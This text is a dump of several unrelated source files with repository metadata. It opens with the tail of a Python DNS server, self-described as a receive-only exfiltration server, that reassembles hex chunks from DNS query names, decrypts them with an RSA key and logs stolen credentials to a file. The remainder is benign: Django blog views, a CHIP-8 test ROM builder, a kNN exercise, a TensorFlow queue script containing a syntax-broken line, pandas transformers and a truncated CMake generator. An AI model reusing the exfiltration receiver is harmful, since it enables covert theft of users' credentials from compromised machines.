    FIXME: Edge case: Simultaneous exfiltrations will lead to interleaved blocks
    """
    def __init__(self,ttl,outfile, key):
        self.ttl = parse_time(ttl)   # response TTL, parsed from e.g. "60s"
        self.out = outfile           # path that decrypted credentials are appended to
        self.key = key               # RSA private key used for decryption
        # One RSA block arrives as hex chunks of at most MAX_LABEL_SIZE
        # characters (2 hex chars per byte), so this many chunks are expected.
        self.chunk_num = ceil(key.size_in_bytes() / (MAX_LABEL_SIZE/2.0))
        # Keep track of requests: maps chunk index -> hex chunk data
        self.chunks = {}
    def decrypt(self, block):
        # NOTE(review): this (and str.decode('hex') in resolve) relies on
        # Python 2 str semantics; under Python 3 it would need
        # bytes.fromhex() and bytes handling -- confirm target interpreter.
        rsa = PKCS1_OAEP.new(self.key)
        return rsa.decrypt(block).strip().replace('\x00', '')
    def resolve(self,request,handler):
        """Record one chunk from the queried name; once all expected chunks
        have arrived, decrypt the block and append the plaintext to self.out.
        Always answers with a fixed TXT record."""
        reply = request.reply()
        qname = request.q.qname
        # Format is 00.DATA.domain.tld'
        qstr = str(qname)
        label = qstr.split('.')
        if SYNTAX.match(qstr):
            chunk_id = int(label[0])
            chunk_data = label[1]
            if chunk_id not in self.chunks: self.chunks[chunk_id] = chunk_data
            # Decrypt and dump the chunk
            if len(self.chunks) == self.chunk_num:
                block = "".join([ self.chunks[i] for i in sorted(self.chunks.keys())]).decode('hex')
                plain = self.decrypt(block)
                try:
                    print('[+] %s: Credentials logged for user %s' % (time.ctime(), plain.split(':')[0]))
                    with open(self.out, 'ab') as o:
                        o.write('[%s] %s\n' % (time.ctime(), plain))
                except:
                    pass
                self.chunks.clear()
        reply.add_answer(RR(qname,QTYPE.TXT,ttl=self.ttl, rdata=TXT("x00x00x00x00x00")))
        return reply
if __name__ == '__main__':
    import argparse,sys,time

    # Command-line interface for the exfiltration DNS server.
    p = argparse.ArgumentParser(description="A simple receive-only DNS server for exfiltration")
    p.add_argument("--ttl","-t",default="60s", metavar="<ttl>", help="Response TTL (default: 60s)")
    p.add_argument("--port","-p",type=int,default=53, metavar="<port>", help="Server port (default:53)")
    p.add_argument("--address","-a",default="", metavar="<address>", help="Listen address (default:all)")
    p.add_argument("--output", "-o",required=False, default="creds.txt", help="Filename to output credentials to (default: creds.txt)")
    p.add_argument("--key", "-k",required=True, default="key.pem", help="Path to the private key for decryption")
    args = p.parse_args()

    print('[+] dns.py Started: %s' % (time.ctime()))

    # Load private key
    print('[+] Loading private key...')
    with open(args.key, 'rb') as k:
        raw = k.read()
    try:
        key = RSA.import_key(raw)
    except Exception:
        # BUG fix: this was a bare `except:`, which would also swallow
        # SystemExit/KeyboardInterrupt. Import failed -- maybe the key is
        # protected with a passphrase, so prompt for one and retry.
        try:
            import getpass
            p = getpass.getpass()
            key = RSA.import_key(raw, passphrase=p.strip())
        except Exception as e:
            print('[!] Could not read private key: ' + str(e))
            sys.exit(1)

    resolver = ExfilResolver(args.ttl, args.output, key)
    # logger = DNSLogger("request,reply,truncated,error",False)
    logger = DNSLogger("error",False)
    udp_server = DNSServer(resolver, port=args.port, address=args.address, logger=logger)
    udp_server.start_thread()

    print('[+] DNS Server started')

    # Keep the main thread alive while the server thread handles queries.
    while udp_server.isAlive(): time.sleep(1)
| [
"alex@segfault.me"
] | alex@segfault.me |
bc36940548e88e24a1d05ec6229b731d51e36a2b | 4c585dacfe152f43c94ee48c10ef8a487201c9a1 | /blog/views.py | 8023b406db422721f7b351be225c3b3bfecf19d5 | [] | no_license | t-katsuki/my-first-blog | 2344f9d52bff707acd6b45b0c0c4997fbf6d0a8e | 075633413499e05c9ed1a695da041770ca046e5c | refs/heads/master | 2023-02-07T13:06:43.129895 | 2020-12-31T06:36:10 | 2020-12-31T06:36:10 | 301,278,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,486 | py | from django.shortcuts import render, get_object_or_404
from django.utils import timezone
from .models import Post
from .forms import PostForm
from django.shortcuts import redirect
# Create your views here.
def post_list(request):
    """Render every post whose publication date is not in the future,
    oldest first."""
    published = Post.objects.filter(
        published_date__lte=timezone.now()
    ).order_by('published_date')
    return render(request, 'blog/post_list.html', {'posts': published})
def post_detail(request, pk):
    """Render a single post; respond with 404 when `pk` does not exist."""
    return render(request, 'blog/post_detail.html',
                  {'post': get_object_or_404(Post, pk=pk)})
def post_new(request):
    """Show an empty post form; on a valid POST, create and publish the post
    with the current user as author, then redirect to its detail page."""
    if request.method != "POST":
        # Plain GET: render an unbound form.
        return render(request, 'blog/post_edit.html', {'form': PostForm()})
    form = PostForm(request.POST)
    if not form.is_valid():
        # Re-render with the bound form so validation errors are shown.
        return render(request, 'blog/post_edit.html', {'form': form})
    post = form.save(commit=False)
    post.author = request.user
    post.published_date = timezone.now()
    post.save()
    return redirect('post_detail', pk=post.pk)
def post_edit(request, pk):
    """Edit an existing post: GET pre-fills the form from the instance, a
    valid POST saves it (stamping author and publication date) and redirects."""
    post = get_object_or_404(Post, pk=pk)
    if request.method != "POST":
        return render(request, 'blog/post_edit.html',
                      {'form': PostForm(instance=post)})
    form = PostForm(request.POST, instance=post)
    if not form.is_valid():
        # Re-render with the bound form so validation errors are shown.
        return render(request, 'blog/post_edit.html', {'form': form})
    post = form.save(commit=False)
    post.author = request.user
    post.published_date = timezone.now()
    post.save()
    return redirect('post_detail', pk=post.pk)
"t.katsuki@hotmail.co.jp"
] | t.katsuki@hotmail.co.jp |
65a0a21d4115a39b32a812e6d421e15f132027a2 | 06232badd86105e053317eb272771eb7767c10ae | /chip8/testprograms/SNEVxByte/maketest.py | 4315c25628565d7b9b8cca39fa0cea43a7ab8c3e | [
"MIT"
] | permissive | MaxStrange/mychip8 | 010f242c515e89baa89540b8611ae62f7e943824 | f81dd44bf6d77a71e2f65d5eb1fdac9b7fec8593 | refs/heads/master | 2020-04-11T19:25:58.266701 | 2019-02-21T00:39:24 | 2019-02-21T00:39:24 | 162,033,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 644 | py | nop = b'\x00\x00'
brk = b'\x00\xA0'  # break/halt pseudo-opcode
ld = b'\x63\x25'   # LD V3, 0x25 -- load the byte 0x25 into register V3
se = b'\x43\x23'   # 4xkk: skip next instruction because V3 (0x25) != 0x23
# ROM layout, one 2-byte opcode per slot starting at 0x0200 (`nop` is
# defined above).
program = (
    ld,    # 0x0200: load 0x25 into V3
    se,    # 0x0202: compare V3 against 0x23; the skip should fire
    brk,   # 0x0204: only reached if the skip failed
    nop,   # 0x0206: success path NOPs...
    nop,   # 0x0208
    nop,   # 0x020A
    brk,   # 0x020C: expected stopping point
    nop,   # 0x020E
)
with open("snevxbytetest.bin", 'wb') as f:
    f.write(b"".join(program))
| [
"max.strange@synapse.com"
] | max.strange@synapse.com |
0f031e97fde4e6a473911818f72df966f6d07f8b | 8d0406ab213142fd9fa66330ed3ac5ec7b123444 | /Machine-Learning/in-action/kNN/kNN.py | d609dc91293c02e09736851b10c3ceb0712db33d | [] | no_license | NSGUF/PythonLeaning | da32929bef452a1d32f6c26732ad7801d8c93cbc | 7ce6bfbd1e57417377027cae8886f7953bec2848 | refs/heads/master | 2021-01-19T16:37:11.839347 | 2018-06-25T01:40:30 | 2018-06-25T01:40:30 | 101,011,546 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,411 | py | # -*- coding: utf-8 -*-
"""
@Created on 2018/5/28 11:16
@author: ZhifengFang
"""
import numpy as np
import operator
import os
def createDateSet():
    """Return a toy data set: four 2-D points and their class labels."""
    labels = ['A', 'A', 'B', 'B']
    group = np.array([[1.0, 1.1],
                      [1.0, 1.0],
                      [0, 0],
                      [0, 0.1]])
    return group, labels
# k-nearest-neighbours classifier.
def classify0(inX, dataSet, labels, k):
    """Return the majority label among the k training points closest to inX.

    inX: the point to classify; dataSet: one training point per row;
    labels: the label of each row; k: number of neighbours to poll.
    """
    # Euclidean distance from inX to every row (broadcasting replaces np.tile).
    diffs = dataSet - np.asarray(inX)
    distances = np.sqrt((diffs ** 2).sum(axis=1))
    # Tally the labels of the k nearest rows.
    votes = {}
    for neighbour in distances.argsort()[:k]:
        lab = labels[neighbour]
        votes[lab] = votes.get(lab, 0) + 1
    # Ties resolve to the label inserted first, matching the stable sort
    # used by the original implementation.
    return max(votes.items(), key=lambda item: item[1])[0]
# dataSet, labels = createDateSet()
# print(classify0([0, 0], dataSet, labels, 3))
# Read a data file, storing the features in an array and labels in a list.
def filetomatrix(filename):
    """Parse a tab-separated data file.

    Each line holds three float feature columns followed by an int label.
    Returns (ndarray of shape (n, 3), list of int labels).
    """
    # BUG fix: the original opened the file without closing it; `with`
    # guarantees the handle is released even on error.
    with open(filename) as f:
        lines = f.readlines()
    mat = np.empty(shape=(len(lines), 3))
    classLabels = []
    for i, line in enumerate(lines):
        fields = line.strip().split('\t')
        mat[i, :] = fields[:3]   # numpy converts the strings to floats
        classLabels.append(int(fields[-1]))
    return mat, classLabels
# mat, classLabels = filetomatrix('datingTestSet2.txt')
# Min-max normalisation, per column: (x - min_x) / (max_x - min_x).
def autoNorm(dataSet):
    """Scale every column of dataSet into [0, 1].

    Returns (normalised array, per-column range, per-column minimum).
    NOTE: a constant column (range 0) still divides by zero, as before.
    """
    minVals = dataSet.min(0)
    maxVals = dataSet.max(0)
    ranges = maxVals - minVals
    # Broadcasting replaces the original np.tile() copies and removes a
    # dead np.empty() allocation that was immediately overwritten.
    normDataSet = (dataSet - minVals) / ranges
    return normDataSet, ranges, minVals
# Evaluation: split the data into a test part and a training part, classify
# each test row, and print the error rate.
# NOTE(review): the original (Chinese) comment claimed a 90% train / 10%
# test split, but the code uses int(0.5 * m), i.e. 50/50 -- confirm which
# ratio is intended.
def datingClassTest():
    """Run classify0 on 'datingTestSet2.txt' and print the error rate."""
    dataMat, dataLabels = filetomatrix('datingTestSet2.txt')
    dataMat, ranges, minVals =autoNorm(dataMat)
    m = len(dataLabels)
    num_test = int(0.5 * m)
    num_error = 0
    for i in range(num_test):
        # Rows [0, num_test) are the test set; the rest train the model.
        label = classify0(dataMat[i, :], dataMat[num_test:m, :], dataLabels[num_test:m], 3)
        if label != dataLabels[i]:
            num_error += 1
    print('错误率为:', num_error / float(num_test))
    print(num_error)
# datingClassTest()
# Read one person's feature values from stdin and predict the class.
def classifyPersion():
    """Prompt for three feature values and print the predicted preference label."""
    result = ['不喜欢', '一般', '喜欢']
    x1 = float(input('x1'))
    x2 = float(input('x2'))
    x3 = float(input('x3'))
    mat, labels = filetomatrix('datingTestSet2.txt')
    mat, ranges, minVals = autoNorm(mat)
    # BUG fix: the query point must be scaled exactly like the training
    # data; the original passed the raw values to classify0 while `mat`
    # was already normalised. (Also stops shadowing the builtin `min`.)
    test = (np.array([x1, x2, x3]) - minVals) / ranges
    resultlabel = classify0(test, mat, labels, 3)
    print(result[resultlabel - 1])
# classifyPersion()
def imgtovector(filename):
    """Flatten a text 'image' of digit characters into a flat list of ints.

    Each line of the file is a string of characters such as '0'/'1';
    surrounding whitespace on each line is ignored.
    """
    # BUG fix: the original never closed the file handle; `with` does, and
    # the comprehension replaces the nested append loops.
    with open(filename) as f:
        return [int(ch) for line in f for ch in line.strip()]
# print(len(imgtovector('C:\\Users\\ZhifengFang\\Desktop\\machinelearninginaction\\Ch02\\testDigits\\0_13.txt')))
# Load the handwriting data set and its labels; input: a directory path.
def getHandWritingData(dirPath):
    """Read every text-image file in dirPath.

    The digit before '_' in each file name is its label (e.g. '0_13.txt'
    has label 0). Returns (ndarray of flattened images, list of int labels).
    """
    filelist=os.listdir(dirPath)# file names inside the directory
    m=len(filelist)  # (unused)
    dataMat,dataLabels=[],[]
    for filename in filelist:# iterate over the files
        dataMat.append(imgtovector(dirPath+'\\'+filename))
        dataLabels.append(int(filename.split('_')[0]))
    return np.array(dataMat),dataLabels
# Evaluate kNN on the handwriting digit folders.
def handWritingClassTest():
    """Classify every test digit against the training folder and print the
    error rate. Paths are hard-coded to the book's example data layout."""
    testMat,testLabels=getHandWritingData('C:\\Users\\ZhifengFang\\Desktop\\machinelearninginaction\\Ch02\\testDigits')
    trainMat,trainLabels=getHandWritingData('C:\\Users\\ZhifengFang\\Desktop\\machinelearninginaction\\Ch02\\trainingDigits')
    num_error=0
    for i in range(len(testLabels)):
        label=classify0(testMat[i,:],trainMat,trainLabels,3)
        if label!=testLabels[i]:
            num_error+=1
    print('错误率:',num_error/float(len(testLabels)))
# Runs the evaluation when the module is executed/imported.
handWritingClassTest()
| [
"1968083780@qq.com"
] | 1968083780@qq.com |
dc544996c75cbe99cde7603bbe812eada4e90912 | 69e3cc7f6a41831f7e4aa24a6e6c48add7268c55 | /temp.py | c41170964642c16e00610bc7dbc2581601190482 | [] | no_license | xxjjvxb/tensorflow_project | 2e69d6256352c57dc2551e143fc208f1477595f2 | d276fcd120b549eac7eb51855fbf9a38fc398876 | refs/heads/master | 2021-05-16T14:09:13.571119 | 2018-04-26T04:58:07 | 2018-04-26T04:58:07 | 118,029,818 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 880 | py | import tensorflow as tf
from numpy.random.mtrand import shuffle
# Define the filename queue feeding the CSV reader.
filename_queue = tf.train.string_input_producer(
    ['/Users/terrycho/training_datav2/queue_test_data/b1.csv',
     '/Users/terrycho/training_datav2/queue_test_data/c2.csv'],
    shuffle=False, name='filename_queue')
# Define the reader: emits one CSV line per read.
reader = tf.TextLineReader()
key, value = reader.read(filename_queue)
# Define the decoder. BUG fix: the original line
#   record_defaults = [id, num, year, rtype , rtime = tf.decode_csv(
# was a syntax error; split it into the defaults list and the decode call.
# TODO(review): confirm the per-column default types against the CSV files.
record_defaults = [[0], [0], [0], [''], ['']]
id, num, year, rtype, rtime = tf.decode_csv(
    value, record_defaults=record_defaults, field_delim=',')
with tf.Session() as sess:
    coord = tf.train.Coordinator()
    threads = tf.train.start_queue_runners(sess=sess, coord=coord)
    for i in range(100):
        print(sess.run([id, num, year, rtype, rtime]))
    coord.request_stop()
    coord.join(threads)
| [
"xxjjvxb@gmail.com"
] | xxjjvxb@gmail.com |
c36ce5cccc3eda9052f933b6c22b6c87d032c6dd | 592fdbcbc6847a3c0ccceab15f7175a06879d50a | /application/__init__.py | 875b04e4784655dc089936ce9cedf1a366186233 | [] | no_license | Varjokorento/tsohasovellus19 | ece0ca8c2de3683754b35b09010374b1552f92b5 | 31d7ec2c357d0cf71060d6841d57d1f820a029f7 | refs/heads/master | 2021-06-11T06:40:27.795453 | 2019-05-03T18:44:00 | 2019-05-03T18:44:00 | 175,022,003 | 0 | 0 | null | 2021-06-10T21:17:56 | 2019-03-11T14:50:58 | Python | UTF-8 | Python | false | false | 2,005 | py | from flask import Flask
from flask_bcrypt import Bcrypt
# Application instance and the password-hashing extension used by auth views.
app = Flask(__name__)
bcrypt = Bcrypt(app)
from flask_sqlalchemy import SQLAlchemy
import os
# Use the Heroku-provisioned database in production, local SQLite otherwise.
if os.environ.get("HEROKU"):
    app.config["SQLALCHEMY_DATABASE_URI"] = os.environ.get("DATABASE_URL")
else:
    app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///tasks.db"
    app.config["SQLALCHEMY_ECHO"] = True  # log generated SQL during development
db = SQLAlchemy(app)
from flask_login import LoginManager, current_user
# Flask-Login setup: unauthenticated users are redirected to the
# "auth_login" endpoint with the message below.
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = "auth_login"
login_manager.login_message = "Please login to use this functionality."
from functools import wraps
def login_required(role="STD"):
    """Decorator factory: require an authenticated user whose roles include
    `role` or the admin role "A"; otherwise defer to login_manager.unauthorized().
    """
    def wrapper(fn):
        @wraps(fn)
        def decorated_view(*args, **kwargs):
            # BUG fix: the original called current_user.roles() into an
            # unused variable *before* these checks, which fails for
            # anonymous users; authenticate first.
            if not current_user:
                return login_manager.unauthorized()
            if not current_user.is_authenticated:
                return login_manager.unauthorized()
            # Deny by default. (The original `if role == role:` was a
            # tautology, so the role check always ran; made explicit here.)
            unauthorized = True
            for user_role in current_user.roles():
                if user_role == role or user_role == "A":
                    unauthorized = False
                    break
            if unauthorized:
                return login_manager.unauthorized()
            return fn(*args, **kwargs)
        return decorated_view
    return wrapper
@login_manager.user_loader
def load_user(user_id):
    """Flask-Login callback: fetch the User for a session's stored id."""
    return User.query.get(user_id)
from application import views
from application.models import models
from application.courses import views
from application.questions import views
from application.comments import views
from application.statistics import views
from application.auth import views
from application.models.models import User
from os import urandom
# NOTE(review): the secret key is regenerated on every start, so sessions
# and CSRF tokens do not survive a restart -- confirm this is intended.
app.config["SECRET_KEY"] = urandom(32)
try:
db.create_all()
except:
pass | [
"kalle.pusa@gmail.com"
] | kalle.pusa@gmail.com |
cd77a0eebcbd82462d25deebad66d90ecdf94b77 | 0fc5294a60e11c8d6a0f2d6253c7d03cec7bb338 | /solutions/636. Exclusive Time of Functions.py | c174b046a505b5587d92a4982919a0ee43eca72c | [] | no_license | NiteshTyagi/leetcode | 4011f37adbd9e430f23b7796ba8d8aa488153706 | dddb90daafcd7f4623873d5d84dfd97925c0230f | refs/heads/main | 2023-04-23T23:50:04.722456 | 2021-05-05T06:58:47 | 2021-05-05T06:58:47 | 328,474,411 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,018 | py | class Solution:
def exclusiveTime(self, n: int, logs: List[str]) -> List[int]:
from collections import Counter
stack = []
maxTime = max([int(log.split(':')[2]) for log in logs])
if maxTime>=100000000:
if n==1:
return [maxTime+1]
elif n==2:
return [90000001,10000000]
timeScale = [-1]*(maxTime+1)
for log in logs:
fun,status,tstp=log.split(':')
if status=='start':
timeScale[int(tstp)]= int(fun)
stack.append(int(tstp))
else:
top = stack.pop()
for i in range(top+1,int(tstp)+1):
if timeScale[i]==-1:
timeScale[i]= int(fun)
timeScale=Counter(timeScale)
return list(timeScale.values())
| [
"33661780+NiteshTyagi@users.noreply.github.com"
] | 33661780+NiteshTyagi@users.noreply.github.com |
8d81c075adcadeca3d6affb1dc0c87707221c661 | 75e8f932e1e08c7e71380e6b71d85ddd04f052dd | /SDAPythonIntermediateRegularExpressions/sample_5.py | a68baa55b53395b2eb11480aac8076c72260917d | [] | no_license | aeciovc/sda_python_ee4 | fe470a253126ad307c651d252f9f9b489da32835 | 9e1e8be675fcafe4a61c354b55b71f53ad2af0fe | refs/heads/master | 2023-08-29T15:17:34.033331 | 2021-10-31T09:41:57 | 2021-10-31T09:41:57 | 365,678,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 66 | py | import re
print(re.sub(r"[a-z]{8}", "dog", "Alice has elephant")) | [
"aeciovc@gmail.com"
] | aeciovc@gmail.com |
06594cba0c19c2ed36c5d8472919f5c95dda1740 | 59d5c5dcf531e52adbd94f8a192fa5d933056d01 | /HomeDrink/asgi.py | 16b0f366838fd4ec2319a91314e6ecf38c03661e | [] | no_license | JeffreykAndersen/HomeBar | 4a4b2cb1b5d27f479f3d6e2460f112dae9d79489 | 8b6c3e4302d9403451f8fb7745312d796b0a8442 | refs/heads/master | 2022-12-23T11:00:22.795708 | 2020-09-19T22:43:02 | 2020-09-19T22:43:02 | 296,962,784 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | """
ASGI config for HomeDrink project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Point Django at the project settings before the application is built.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'HomeDrink.settings')
application = get_asgi_application()  # module-level ASGI callable servers look for
| [
"jeffreykandersen@gmail.com"
] | jeffreykandersen@gmail.com |
6ba44a2283a1c3e70f0210af98521fbb9c634623 | 294c35259125e1c55cfdd5247cee651a07b3cc01 | /src/map/migrations/0001_initial.py | 52a0310446ae9821e95ec290c04c7762db920978 | [
"MIT"
] | permissive | andgein/sis-2016-winter-olymp | a82557d61b7748c6813e31779bcc74e92874a96c | 70962d861b3cf69e982949878ae4dccc2818b618 | refs/heads/master | 2021-08-30T15:00:10.691639 | 2017-12-18T11:05:27 | 2017-12-18T11:05:27 | 114,627,656 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 6,224 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2016-12-31 05:13
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import djchoices.choices
import relativefilepathfield.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='AbstractTile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('row', models.PositiveIntegerField(help_text='Номер строки')),
('column', models.PositiveIntegerField(help_text='Номер колонки')),
('ejudge_short_name', models.CharField(db_index=True, max_length=255)),
('name', models.CharField(max_length=255)),
('statement_file_name', relativefilepathfield.fields.RelativeFilePathField(match='.*\\.pdf', path=settings.PROBLEMS_STATEMENTS_DIR)),
('automatic_open_time', models.PositiveIntegerField(blank=True, default=None, help_text='Время в минутах, после которого задача откроется автоматически. Если NULL, то не откроется', null=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='TileStatus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.PositiveIntegerField(choices=[(0, 'Closed'), (1, 'Opened'), (2, 'Read'), (3, 'Tried'), (4, 'Solved')], db_index=True, validators=[djchoices.choices.ChoicesValidator({0: 'Closed', 1: 'Opened', 2: 'Read', 3: 'Tried', 4: 'Solved'})])),
],
options={
'ordering': ['status'],
},
),
migrations.CreateModel(
name='AbstractBonus',
fields=[
('abstracttile_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='map.AbstractTile')),
],
options={
'abstract': False,
},
bases=('map.abstracttile',),
),
migrations.CreateModel(
name='Problem',
fields=[
('abstracttile_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='map.AbstractTile')),
('solved_award', models.PositiveIntegerField(help_text='Приз за правильное решение задачи')),
('wrong_penalty', models.PositiveIntegerField(help_text='Штраф за неправильную попытку')),
],
options={
'abstract': False,
},
bases=('map.abstracttile',),
),
migrations.AddField(
model_name='tilestatus',
name='tile',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='statuses', to='map.AbstractTile'),
),
migrations.AddField(
model_name='tilestatus',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='tiles_statuses', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='abstracttile',
name='polymorphic_ctype',
field=models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='polymorphic_map.abstracttile_set+', to='contenttypes.ContentType'),
),
migrations.CreateModel(
name='CallMasterBonus',
fields=[
('abstractbonus_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='map.AbstractBonus')),
],
options={
'abstract': False,
},
bases=('map.abstractbonus',),
),
migrations.CreateModel(
name='GetAnyTestBonus',
fields=[
('abstractbonus_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='map.AbstractBonus')),
],
options={
'abstract': False,
},
bases=('map.abstractbonus',),
),
migrations.CreateModel(
name='GetTangerinesBonus',
fields=[
('abstractbonus_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='map.AbstractBonus')),
],
options={
'abstract': False,
},
bases=('map.abstractbonus',),
),
migrations.CreateModel(
name='OpenAnyTileBonus',
fields=[
('abstractbonus_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='map.AbstractBonus')),
],
options={
'abstract': False,
},
bases=('map.abstractbonus',),
),
migrations.CreateModel(
name='OpenWideLocalityBonus',
fields=[
('abstractbonus_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='map.AbstractBonus')),
],
options={
'abstract': False,
},
bases=('map.abstractbonus',),
),
]
| [
"andgein@yandex.ru"
] | andgein@yandex.ru |
94b33fcd13fe408268794d0ed3271c0df3ee5314 | 62adfc4e5f46d530cee16f3a4b8830fec3df9628 | /1st Report/transformers/transformers.py | d9ed0558501e2847a3e5c85bbfed9460c9d7e8a4 | [] | no_license | rjna/ldssa-capstone | 8899b191267c8a6463625605406f3a565ccf7be7 | a5650263638670022a7eb0bc2f29416596b082f0 | refs/heads/master | 2021-05-17T23:29:31.117104 | 2020-04-02T19:44:00 | 2020-04-02T19:44:00 | 251,002,843 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,219 | py | from sklearn.base import TransformerMixin, ClassifierMixin
import pandas as pd
import numpy as np
class NumericalDataCleaning(TransformerMixin):
    """Stateless cleaning of numeric columns (fit is a no-op)."""
    def transform(self, X, *_):
        X_new = X.copy()
        # Collapse the coded age values 1..11 to the column median.
        # NOTE(review): the median is computed before the replacement, so it
        # may itself be one of the codes being replaced -- confirm intent.
        X_new['SubjectAge'] = X_new['SubjectAge'].replace([1., 2., 3., 4., 5., 6., 7., 8., 9.,
                                                           10., 11.], X_new['SubjectAge'].median())
        X_new = X_new.drop(columns=['ResidentIndicator'])
        return X_new
    def fit(self, *_):
        # No state is learned from the data.
        return self
class CategoricalDataCleaning(TransformerMixin):
    """Stateless cleaning of categorical columns (fit is a no-op):
    normalises casing, fills missing values and harmonises names."""
    def transform(self, X, *_):
        X_new = X.copy()
        X_new.InterventionLocationName = X_new.InterventionLocationName.str.lower()
        X_new.InterventionLocationName = X_new.InterventionLocationName.fillna('unknown')
        X_new.StatuteReason = X_new.StatuteReason.fillna('Other/Error')
        X_new.SearchAuthorizationCode = X_new.SearchAuthorizationCode.fillna('N')
        X_new.InterventionReasonCode = X_new.InterventionReasonCode.fillna('U')
        X_new.InterventionReasonCode = X_new.InterventionReasonCode.replace('no', 'U')
        X_new.ReportingOfficerIdentificationID = X_new.ReportingOfficerIdentificationID.fillna('unknown')
        # Harmonise department names. (Author's original note "não foi" is
        # Portuguese for "it didn't work" -- verify these values match.)
        X_new['Department Name'] = X_new['Department Name'].replace('Mohegan Tribal', 'Mohegan Tribal Police') # author note: didn't work
        X_new['Department Name'] = X_new['Department Name'].replace('Mashantucket Pequot', 'Mashantucket Pequot Police')# author note: didn't work
        X_new = X_new.drop(columns=['SubjectSexCode', 'SubjectEthnicityCode', 'SubjectRaceCode'])
        return X_new
    def fit(self, *_):
        # No state is learned from the data.
        return self
class CreateCyclicalFeatures(TransformerMixin):
    """Expand InterventionDateTime into a year column plus sin/cos cyclical
    encodings of month, day and hour (fit is a no-op)."""
    def transform(self, X, *_):
        X_new = X.copy()
        X_new['InterventionDateTime'] = pd.to_datetime(X_new['InterventionDateTime'], format='%m/%d/%Y %I:%M:%S %p')
        X_new['InterventionDateYear'] = X_new['InterventionDateTime'].dt.year
        # Months take values 1..12, so period 12 keeps them distinct.
        X_new['InterventionDateMonth'] = X_new['InterventionDateTime'].dt.month
        X_new['InterventionDateMonth_sin'] = np.sin((2. * X_new['InterventionDateMonth'] * np.pi / 12))
        X_new['InterventionDateMonth_cos'] = np.cos((2. * X_new['InterventionDateMonth'] * np.pi / 12))
        # Days take values 1..31; period 31 keeps them distinct.
        X_new['InterventionDateDay'] = X_new['InterventionDateTime'].dt.day
        X_new['InterventionDateDay_sin'] = np.sin((2. * X_new['InterventionDateDay'] * np.pi / 31))
        X_new['InterventionDateDay_cos'] = np.cos((2. * X_new['InterventionDateDay'] * np.pi / 31))
        X_new['InterventionDateHour'] = X_new['InterventionDateTime'].dt.hour
        # BUG fix: hours take values 0..23, so the period must be 24; with
        # the original divisor of 23, hour 23 mapped onto the same circle
        # point as hour 0.
        X_new['InterventionDateHour_sin'] = np.sin((2. * X_new['InterventionDateHour'] * np.pi / 24))
        X_new['InterventionDateHour_cos'] = np.cos((2. * X_new['InterventionDateHour'] * np.pi / 24))
        return X_new.drop(['InterventionDateTime', 'InterventionDateMonth', 'InterventionDateDay', 'InterventionDateHour'], axis=1)
    def fit(self, *_):
        # No state is learned from the data.
        return self
class Test(TransformerMixin):
    """Debug helper for pipelines: passes the data through unchanged while
    printing the current number of columns."""
    def transform(self, X, *_):
        X_new = X.copy()
        print(len(X_new.columns))
        return X_new
    def fit(self, *_):
        # No state is learned from the data.
        return self
"ricardo.neves.alberto@gmail.com"
] | ricardo.neves.alberto@gmail.com |
5f35f0850dd66506e2a7d136194c5e78d63f60b8 | 915e4e9389142d8ee750102a032f35af50633f2b | /tools/make_cmakelists.py | 22f3757155a91f943f30292ff442d31b61361924 | [
"BSD-3-Clause"
] | permissive | laurentlb/upb | 9363061fd85247bf322da9049359494d1ce6f575 | 1a5a609b0e504aa5bf25e5b79d505974e34f0f98 | refs/heads/master | 2020-05-26T23:58:16.100270 | 2019-05-24T12:22:13 | 2019-05-24T12:22:13 | 188,416,917 | 0 | 0 | NOASSERTION | 2019-05-24T12:18:52 | 2019-05-24T12:18:52 | null | UTF-8 | Python | false | false | 7,191 | py | #!/usr/bin/env python
"""TODO(haberman): DO NOT SUBMIT without one-line documentation for make_cmakelists.
TODO(haberman): DO NOT SUBMIT without a detailed description of make_cmakelists.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import textwrap
import os
def StripColons(deps):
  """Strip the leading ':' from each Bazel label, e.g. ':upb' -> 'upb'.

